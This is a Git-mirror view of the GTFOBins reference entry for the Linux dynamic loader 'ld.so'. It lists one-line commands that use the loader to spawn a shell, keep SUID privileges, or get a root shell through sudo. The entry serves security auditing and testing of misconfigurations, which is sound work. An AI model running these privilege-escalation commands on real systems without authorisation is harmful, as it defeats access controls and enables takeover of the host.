1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 10:53:35 +02:00
GTFOBins.github.io/_gtfobins/ld.so.md
2018-10-05 18:55:38 +01:00

17 lines
385 B
Markdown

---
description: |
`ld.so` is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with:
```
$ strings /proc/self/exe | head -1
/lib64/ld-linux-x86-64.so.2
```
functions:
shell:
- code: /lib/ld.so /bin/sh
suid:
- code: ./ld.so /bin/sh -p
sudo:
- code: sudo /lib/ld.so /bin/sh
---